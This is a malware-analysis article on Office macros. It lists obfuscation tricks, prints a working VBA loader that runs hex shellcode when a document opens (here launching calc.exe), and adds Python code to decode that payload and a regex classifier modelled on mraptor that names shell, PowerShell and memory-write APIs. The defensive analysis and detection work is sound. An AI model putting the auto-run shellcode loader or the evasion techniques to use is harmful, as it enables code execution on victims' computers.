Malicious Code Analysis: Analysing Office Macro Code (Part 2)


Simple obfuscation and anti-debugging techniques

1. Using ActiveX triggers. A typical example: the InkPicture1_Painted event handler.
2. Hiding data.
3. Using Word document variables to hide data. A document variable can store up to 64 KB of data and is not visible anywhere in the MS Word user interface.
4. Obfuscating function calls with CallByName: https://msdn.microsoft.com/en-us/library/office/gg278760.aspx
5. Running commands through WMI.
6. Calling PowerShell.
7. Running VBScript or JScript, i.e. running VBS/JS code without writing a file to disk. Reference: https://docs.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-6.0/aa227637(v=vs.60)?redirectedfrom=MSDN Code sample: https://www.experts-exchange.com/questions/28190006/VBA-ScriptControl-to-run-JAVA-Script-Function.html
8. Running shellcode through an API callback.
An example of running shellcode from VBA:

' Import Win32 APIs under innocuous-looking names (32-bit declarations, no PtrSafe)
Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As Long
Private Declare Function allocateMemory Lib "kernel32" Alias "HeapAlloc" (ByVal hHeap As Long, ByVal dwFlags As Long, ByVal dwBytes As Long) As Long
Private Declare Sub copyMemory Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)
' EnumSystemCodePagesW takes a callback pointer; the "callback" handed to it will be the shellcode buffer
Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long

Private Sub Document_Open()
    Dim shellCode As String
    Dim shellLength As Byte
    Dim byteArray() As Byte
    Dim memoryAddress As Long
    Dim zL As Long
    Dim rL As Long
    Dim i As Long, pos As Long
    Dim Value As String
    Dim executeResult As Long
    zL = 0

    ' Hex-encoded shellcode; in this example it launches the calculator
    shellCode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6a018d85b20000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500"
    shellLength = Len(shellCode) / 2
    ReDim byteArray(0 To shellLength)

    ' Convert the hex string into a byte array, two characters per byte
    For i = 0 To shellLength - 1
        If i = 0 Then
            pos = i + 1
        Else
            pos = i * 2 + 1
        End If
        Value = Mid(shellCode, pos, 2)
        byteArray(i) = Val("&H" & Value)
    Next

    ' Create an executable heap (HEAP_CREATE_ENABLE_EXECUTE = &H40000) and allocate a buffer in it
    rL = createMemory(&H40000, zL, zL)
    memoryAddress = allocateMemory(rL, zL, &H5000)
    ' Copy the shellcode into the buffer
    copyMemory ByVal memoryAddress, byteArray(0), UBound(byteArray) + 1
    ' Run the buffer by passing it as the enumeration callback
    executeResult = shellExecute(memoryAddress, zL)
End Sub

Source: http://ropgadget.com/posts/abusing_win_functions.html

The first four lines import system libraries so the macro can call system APIs. The shellCode assignment (line 16 of the original listing) holds the hex-encoded shellcode, which in this example opens the calculator. The For loop (line 29) converts the hex encoding into a binary byte stream, the copyMemory call (line 36) copies the shellcode into the buffer, and the shellExecute call (line 38) executes it.
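An analyst usually wants to know what such a macro would run without ever executing it. The Python below is an added example written for this article, not code from the original post or from ropgadget.com: it pulls the long hex literal out of a constructed excerpt of the macro above, decodes it exactly the way the VBA loop does (1-based Mid, two characters per byte), confirms the result against bytes.fromhex, and lists the printable strings in the decoded bytes, which is where the command line the shellcode launches surfaces. The excerpt and the helper names are constructed for the example.

```python
import re
import string

# Constructed excerpt of the macro listed above: only the hex literal matters here.
VBA_SOURCE = '''
Private Sub Document_Open()
    shellCode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6a018d85b20000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500"
    shellLength = Len(shellCode) / 2
End Sub
'''

# A long all-hex string literal assigned to a variable; requiring 16+ hex digits
# avoids matching short constants such as colour codes.
HEX_ASSIGN = re.compile(r'(\w+)\s*=\s*"([0-9a-fA-F]{16,})"')


def find_hex_strings(vba_source):
    """Map variable name -> hex literal for every long hex string in the macro."""
    return dict(HEX_ASSIGN.findall(vba_source))


def decode_like_vba(hex_string):
    """Mirror the macro's loop: Value = Mid(shellCode, pos, 2); Val("&H" & Value)."""
    length = len(hex_string) // 2          # shellLength = Len(shellCode) / 2
    out = bytearray()
    for i in range(length):
        pos = 1 if i == 0 else i * 2 + 1   # the macro's If/Else is simply pos = 2*i + 1
        pair = hex_string[pos - 1:pos + 1]  # Mid is 1-based, Python slices are 0-based
        out.append(int(pair, 16))          # Val("&H" & Value)
    return bytes(out)


def printable_strings(blob, min_len=4):
    """Return runs of printable ASCII of at least min_len bytes (NUL-terminated strings included)."""
    printable = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    runs, current = [], bytearray()
    for b in blob + b"\x00":               # sentinel flushes a trailing run
        if b in printable:
            current.append(b)
            continue
        if len(current) >= min_len:
            runs.append(current.decode("ascii"))
        current = bytearray()
    return runs


def analyse(vba_source):
    """Decode every embedded hex blob and summarise what an analyst would look at first."""
    report = {}
    for name, hex_string in find_hex_strings(vba_source).items():
        payload = decode_like_vba(hex_string)
        report[name] = {
            "size": len(payload),
            "matches_fromhex": payload == bytes.fromhex(hex_string),
            # fc e8 (cld; call) is the usual opening of position-independent Windows shellcode
            "starts_with_cld_call": payload[:2] == b"\xfc\xe8",
            "strings": printable_strings(payload),
        }
    return report


if __name__ == "__main__":
    for name, info in analyse(VBA_SOURCE).items():
        print(name, info["size"], "bytes, strings:", info["strings"])
```

Running the script prints the decoded size (193 bytes for this payload) and the recovered strings, among them "calc.exe", which is how the article's statement that the shellcode opens the calculator can be verified statically before any sandbox run.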
About Office encryption

In the Office 97-2003 era the concept of file encryption was not yet popular, and macro code from that time was almost never encrypted. Only from Office 2007 onwards did VBA code start to be protected by encryption. Two decryption tools worth sharing:
https://github.com/nolze/msoffcrypto-tool
https://github.com/herumi/msoffice
Macro code analysis tools

1. First, the VBA editor (for example, press Alt + F11 inside an Office document). The VBA editor makes it easy to debug and step through the code. One trick worth mentioning here is hiding VBA code from the VBA editor: https://github.com/outflanknl/EvilClippy
2. olevba: https://github.com/decalage2/oletools/wiki/olevba. This tool extracts the macro code from Office documents effectively; it requires a Python environment.

[Article image: olevba output]
The image above lists the file types olevba supports and some points worth attention, such as auto-execution code, dangerous keywords (Downloads, File writes, Shell execution, DLL calls, etc.) and IOCs.
Of course, static analysis often cannot solve the problem on its own, and dynamic analysis is needed to understand the malicious code's functionality better. Here is a tool for that, ViperMonkey: https://github.com/decalage2/ViperMonkey
The run output looks like this:
[Article image: ViperMonkey run output]
mraptor

mraptor is an open-source macro code detection project on GitHub: https://github.com/decalage2/oletools/wiki/mraptor
A brief overview of how it works. mraptor has three detection criteria:
A: auto-execution (triggers)
W: writes to the file system or to memory
X: executes a file or any payload outside the VBA context
When an Office macro meets condition A and at least one of W or X, mraptor marks it as malicious. The project depends on a Python environment; usage is as follows:
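The A/W/X rule just described, together with the evasion techniques listed in the first section, can be turned into a small classifier. The Python below is an added example written for this article, not mraptor's own code: its regexes are a simplified approximation of the three criteria (mraptor's real patterns live in oletools), it additionally reports which of the earlier-listed techniques appear in the source, and it maps the verdict to the exit codes documented in mraptor's usage text. The sample macros are constructed for the example and are not real malware.

```python
import re

# Simplified approximation of mraptor's three criteria. These patterns are an
# assumption for illustration, not the project's own rules.
RULES = {
    "A": [  # auto-execution: document events and ActiveX control events
        r"\b(AutoOpen|AutoExec|AutoClose|Auto_Open|Document_Open|Document_Close|Workbook_Open|Workbook_Activate)\b",
        r"\b\w+_(Painted|Click|Change|GotFocus|LostFocus|Layout|Resize|MouseMove)\b",
    ],
    "W": [  # writes to the file system or to memory
        r"\bOpen\b[^\n]*\bFor\s+(Output|Binary|Append)\b",
        r"\b(Put|Write|Print)\s*#",
        r"\b(FileCopy|SaveAs|CreateTextFile|SaveToFile)\b",
        r"Scripting\.FileSystemObject|ADODB\.Stream",
        r"\bDeclare\b[^\n]*\b(HeapCreate|HeapAlloc|VirtualAlloc|RtlMoveMemory|WriteProcessMemory)\b",
    ],
    "X": [  # executes a file or payload outside the VBA context
        r"\b(Shell|ShellExecute|WinExec|CreateProcess|CreateThread)\b",
        r"WScript\.Shell|Shell\.Application",
        r"\bpowershell\b|winmgmts:|Win32_Process",
        r"\bScriptControl\b",
        r"\bDeclare\b[^\n]*\bAlias\s+\"EnumSystemCodePagesW\"",
    ],
}

# Technique indicators from the first section, reported alongside the verdict.
TECHNIQUES = {
    "ActiveX event trigger": r"\b\w+_(Painted|Click|Change|GotFocus|MouseMove)\b",
    "CallByName call obfuscation": r"\bCallByName\b",
    "data in Word document variables": r"\.Variables\b",
    "WMI command execution": r"winmgmts:|Win32_Process",
    "PowerShell invocation": r"\bpowershell\b",
    "in-memory VBScript/JScript": r"\bScriptControl\b",
    "shellcode via API callback": r"\bDeclare\b[^\n]*\bAlias\s+\"EnumSystemCodePagesW\"",
}

# Exit codes as documented in mraptor's usage text.
EXIT_CODES = {"no_macro": 0, "ok": 2, "suspicious": 20}


def classify(vba_source):
    """Apply the 'A and (W or X)' rule; return verdict, A/W/X flag string, exit code and matches."""
    if not vba_source.strip():
        return {"verdict": "no_macro", "flags": "---", "exit_code": 0, "matches": {}, "techniques": []}
    matches = {}
    for flag, patterns in RULES.items():
        hits = []
        for pattern in patterns:
            hits += [m.group(0) for m in re.finditer(pattern, vba_source, re.I)]
        matches[flag] = hits
    suspicious = bool(matches["A"]) and bool(matches["W"] or matches["X"])
    verdict = "suspicious" if suspicious else "ok"
    return {
        "verdict": verdict,
        "flags": "".join(f if matches[f] else "-" for f in "AWX"),
        "exit_code": EXIT_CODES[verdict],
        "matches": matches,
        "techniques": [name for name, p in TECHNIQUES.items() if re.search(p, vba_source, re.I)],
    }


# Constructed samples (not real malware).
BENIGN = '''
Sub FormatReport()
    ActiveSheet.Range("A1").Font.Bold = True
End Sub
'''

AUTOEXEC_ONLY = '''
Private Sub Document_Open()
    MsgBox "Welcome"
End Sub
'''

# Same shape as the shellcode runner listed earlier: aliased API imports plus a Document_Open trigger.
SHELLCODE_RUNNER = '''
Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As Long
Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long
Private Sub Document_Open()
    executeResult = shellExecute(memoryAddress, zL)
End Sub
'''

# ActiveX trigger plus a PowerShell call, but nothing written to disk or memory.
ACTIVEX_TRIGGER = '''
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As Variant)
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "powershell -File report.ps1"
End Sub
'''

if __name__ == "__main__":
    for label, src in [("benign", BENIGN), ("autoexec only", AUTOEXEC_ONLY),
                       ("shellcode runner", SHELLCODE_RUNNER), ("activex trigger", ACTIVEX_TRIGGER)]:
        r = classify(src)
        print(f"{label:16} {r['flags']} {r['verdict']:10} exit={r['exit_code']} techniques={r['techniques']}")
```

The "autoexec only" sample shows why the rule needs both halves: a Document_Open handler on its own yields the flags A-- and the verdict "ok", which is also how mraptor treats macros that merely run at open time but neither write nor execute anything. The shellcode runner hits all three (AWX) because the aliased HeapCreate import counts as a memory write and the EnumSystemCodePagesW callback as execution.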
Usage: mraptor [options] <filename> [filename2 ...]

Options:
  -h, --help            show this help message and exit
  -r                    find files recursively in subdirectories.
  -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
                        if the file is a zip archive, open all files from it,
                        using the provided password (requires Python 2.6+)
  -f ZIP_FNAME, --zipfname=ZIP_FNAME
                        if the file is a zip archive, file(s) to be opened
                        within the zip. Wildcards * and ? are supported.
                        (default:*)
  -l LOGLEVEL, --loglevel=LOGLEVEL
                        logging level debug/info/warning/error/critical
                        (default=warning)
  -m, --matches         Show matched strings.

An exit code is returned based on the analysis result:
 - 0: No macro
 - 1: Not MS Office
 - 2: Macro OK
 - 10: ERROR
 - 20: SUSPICIOUS

